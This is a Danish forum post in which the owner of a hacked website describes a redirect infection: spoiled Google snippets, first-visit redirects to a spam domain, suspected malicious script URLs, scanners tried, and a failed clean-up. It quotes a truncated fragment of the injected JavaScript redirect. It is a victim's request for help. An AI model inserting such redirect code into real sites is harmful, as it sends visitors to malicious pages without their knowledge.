Min hjemmeside er blevet hacked - HJÆLP

Hej alle eksperter.

Min hjemmeside www.coach.dk er blevet hacked.

Det kommer til udtryk på følgende måde:

Når Coach.dk indgår i et søgeresultat på Google (ex. coach), er Description erstattet med en masse ??????????? (spørgsmålstegn)
Ved mouse over (hover) ud til højre i quick view vises et billede af en let påklædt dame... i stedet for et skærmbillede af hjemmesiden.

Klikker du på linket bliver man sendt til www.coach.dk, men på en eller anden måde bliver man (KUN FØRSTE GANG) redirected til - i dette tilfælde - http://wwwqwertyuiopasdfghjklcom.info/s/soimg123.htm

[SE VEDHÆFTEDE BILLEDFIL]

I samarbejde med Surftown, har vi fundet frem til at følgende hack-domæner og filer er i spil.

http://js.users.51.la/5994915.js
js.users.51.la

Det har vi fundet ud af ved at scanne domænet på hjemmesiden
http://www.unmaskparasites.com

scanner vi den på en anden hjemmeside
http://sitecheck.sucuri.net/scanner/?scan=www.coach.dk

siger den ligeledes at den redirecter til ovennævnte side.

Vi ved også at følgende kode bliver afviklet før <HTML>-tagget

var purl = ["123","100"]
var k=parseInt(2*Math.random())
//alert(k)
window.location.href="http://ww...

Forsøgte løsninger:
* Søgning af ovenstående forekomster i filstruktur (intet resultat)
* Søgning af ovenstående forekomster i db (intet resultat)
* Erstattet default.asp i roden med en tom default.asp og der redirectes stadig første gang

Konklusion - Redirect sker altså før mine filer på webhotellet kommer i spil)


Kommende forsøg:
* Surftown vil forsøge at flytte alle filerne over på et nyt og andet windows webhotel på en ander server, for at se om der så stadig redirectes?

Er der nogen derude der vil hjælpe

Theis Askling